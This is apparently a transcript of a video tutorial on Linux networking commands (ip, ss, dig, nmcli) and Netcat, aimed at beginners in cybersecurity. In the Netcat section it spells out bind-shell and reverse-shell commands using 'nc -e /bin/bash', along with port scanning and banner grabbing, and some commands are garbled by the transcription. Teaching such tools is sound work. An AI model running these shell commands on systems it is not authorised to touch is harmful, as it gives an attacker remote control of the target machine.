Alright, listen up. Today, we are tearing down everything you think you know about Linux networking. This video is critical because we aren't just covering the basics. We are going deep into the network management command line interface and mastering the legendary Netcat. If you want to actually understand how networks work and how to break them, you need to watch this until the end. Also, let's be real, the algorithm hates cybersecurity content. So if you want to support the channel and help us hack the system, smash that like button and subscribe right now. Okay, let's start with the absolute essentials. If you're already a pro, check the timestamps to skip ahead, but don't blame me if you miss a trick. First, let's clear up a massive mistake I see everywhere. If you open a tutorial in 2025 and it tells you to type ifconfig or netstat, close the tab. That stuff is deprecated. It's ancient history. We use the IP command now. To find out who you are on the network, type IPA, that stands for IP address. Ignore the clutter and look for your interface names, like ETH0 for wired or LAN0 for Wi-Fi. See that line that says inet? That is your IP address. See the /24 at the end? That is your subnet mask. This matters because before you launch an attack or secure a server, you need to know your own identity. If you don't know your own IP, you don't know who you are exposing. Next, you need to know how to leave the building. Type IPR. This stands for IP route. Look for the line that says default via. The IP address right next to it, that is your gateway. That is the router you have to pass through to reach the internet. This is critical because if you are pivoting through a network, or if your connection suddenly dies during a hack, this command tells you exactly where your traffic is going, or where it is getting stuck. Now let's look at the most critical command for defense, SS. This is how you find backdoors. To show you how this works, I'm going to simulate a hack. I'm going to open port 4444, a classic hacker port, using Netcat in the background. Okay, the trap is set. Now imagine you're the admin. You want to know if anyone is listening on your system. You don't use netstat. You use SS. The magic combo you need to memorize is that is TULPN. T is for TCP, U is for UDP, L shows listening sockets, P reveals the process ID, and N keeps it numeric so it's fast. Boom, look at that line right there. Local address, and look at the users column. Users. We caught it. SS tells us exactly which port is open and exactly which program opened it. If you see a weird port like this open on your server, and you didn't open it, that means a program is listening for a hacker. That is a backdoor. Okay, now let's talk about DNS Reconnaissance, or DIG. Before we hack, we need to find our target. NS lookup is for beginners. Professionals use DIG. Type diggoogle.com and you get the answer instantly. Want just the IP address? Type dig plus short google.com. Want to find their email servers? Type digmxgoogle.com. This matters because DNS is the phone book of the internet. If you can read the raw DNS data with DIG, you can find servers, mail relays, and subdomains that the company might have forgotten about. That is where you find your entry point. Okay, those are the basics of looking around. Now, let's talk about interacting. Let's talk about the Swiss Army knife. Welcome to the main event. Let's master the most important tool in your arsenal. It's called Netcat. And there is a reason we call it the Swiss Army knife of networking. Whether you are debugging a network, transferring files without FTP, or popping a reverse shell during a penetration test, Netcat is the tool that makes it happen. It reads and writes data across network connections using TCP or UDP. It's simple, it's reliable, and it's everywhere. Let's break down exactly how to use it, from basic chat apps to full system takeover. First, the syntax is deadly simple. It's just in C, followed by your options, the host, and the port. Before we start hacking, you need to know the flags. Here are the ones you will use 99% of the time. -L stands for listen. It tells Netcat to listen for an incoming connection instead of initiating one. -P stands for port. This specifies the source port you want to use. -N tells it to do no DNS lookups. This stops Netcat from doing slow lookups, making everything faster and stealthier. -V stands for verbose. This gives you feedback on what's happening. And finally, -U switches it to UDP mode since the default is TCP. Got it? Good. Now let's use them. Before we attack, we scan. You don't always need nmap if you have Netcat. To scan a range of ports, say 1 to 100 on a target, you run nc-zvn, then the target IP, then the range 1-100. The -z tells it to just scan for open ports, not send data. The -v shows you the results, and the -n skips the slow DNS lookup. You can also scan specific ports to see if a web server or SSH is open. If you want to see what software is running on a port, which is called banner grabbing, just drop the -z and connect directly. Run nc-v followed by the target IP and port 80. This will often dump the server version right into your terminal. Now let's talk about moving data. First, the instant chat app. If you need to talk to someone on another computer securely and quickly, you don't need Slack. On the server side, type nc-lvp8888. You are now listening on port 8888. On the client side, type nc, then the server IP, then 8888. Boom. Anything you type on one screen appears on the other. You just built a chat app in 2 seconds. Next is file transfer. This is a lifesaver during CTFs or when you're on a restricted system. To download a file, the sender pushes the file into the connection by running nc-lvp8888 with a left-facing arrow pointing to the file name. The receiver pulls it out by running nc-nv, the host IP, 8888, with a right-facing arrow pointing to the new file name. To upload a file, it's the same logic, just reversed. Okay, this is what you came for. How to get a shell. There are 2 ways to do this: remote shells and reverse shells. The remote shell is sometimes called a bind shell. This is where the victim listens and you connect to them. On the target machine, run nc-nlvp888-e/bin/bash. That -e flag is dangerous. It tells Netcat to execute a program, in this case bash, and send the input and output over the network. Then you, the attacker, just connect to their IP and port. You now have control of their terminal. But usually, firewalls block incoming connections, so bind shells fail. That is why we use the reverse shell. This is the gold standard. In this scenario, you, the attacker, start a listener first. Run nc-nlvp8888. You are waiting for the call. Then on the target machine, you run nc, followed by your IP, port 8888-e/bin/bash. The victim calls you, the firewall lets the outgoing traffic through, and you catch the shell. Finally, for the pros, Netcat can pipe anything. You can literally clone a hard drive over the network using DD piped into Netcat. You can cat a video file into Netcat and watch it live on another machine using mPlayer. And since Netcat sends text in clear text, if you want to be safe, you can pipe it through OpenSSL to encrypt your traffic on the fly. The verdict is simple. Netcat isn't just a tool, it's a protocol. Learn it, master it, and you can manipulate a network however you want. All right, we have covered the raw tools like IP and Netcat, but now let's talk about the command that actually manages your network on almost every modern Linux system. It's called nmcli. Here is the difference. When you use the IP command, you are changing things in memory. If you reboot, those changes are gone. But nmcli talks to the network manager daemon. It saves your configs. It makes them permanent. If you want to be a sysadmin, this is your daily driver. Let's break down. First, the sanity check. Type nmcli general status. This is your high-level dashboard. It tells you if the network is actually enabled, if you have connectivity, and if the manager is running. It's the "is it plugged in" check for the command line. Next, you need to know what hardware you are working with. Type nmcli device show. This dumps everything: your drivers, your hardware state, your MAC address, and your current IP. It's like the IP address command, but with more system-level detail. Now, the feature that saves you when the GUI crashes: Wi-Fi. Yes, you can manage Wi-Fi entirely from the terminal. Type nmcli device Wi-Fi list. This scans the airwaves and shows you every SSID, signal strength, and security type. Found your network? Connect to it immediately by typing nli device Wi-Fi connect, then your SSID, then the word password, and finally your actual password. Boom, you are online, and because it's nmcli, it will remember that network next time you reboot. But real pros don't rely on DHCP. Real pros set static IPs. To do this, we modify the connection profile. First, list your connections with nmcli connection show. Find the name of your interface. Now we lock it down. Run nmcli connection modify, followed by your connection name. Then set the address. Type IPv4.addresses, followed by your static IP and /24. Set the gateway. Type IPv4.gateway, followed by your router IP. Set the DNS. Type IPv4 DNS, followed by 8.8.8.8. And finally, the most important part, tell it to stop looking for a DHCP server by setting IPv4 method to manual. Once you've typed all that, apply the changes by cycling the interface. Type nmcli connection down, followed by your connection name, and then nmcli connection up. Your static IP is now burned into the system configuration. That is the power of nmcli. It's not just checking the network, it's building a configuration that survives the reboot. You now have the power to control your network from the command line, not just click around in it. But remember, with great power comes great responsibility. Use these skills to secure your systems, not break into others without permission. Your mission for this week? Go into your own Linux machine, disable the GUI network manager for a day, and force yourself to use nmcli and IP for everything. It's the only way to build the muscle memory, and you can read their manual page to know better. If you found this video, destroy that like button and subscribe for more deep dives into the Hacker's Toolkit. Thanks for watching. One life, one shot, make it count.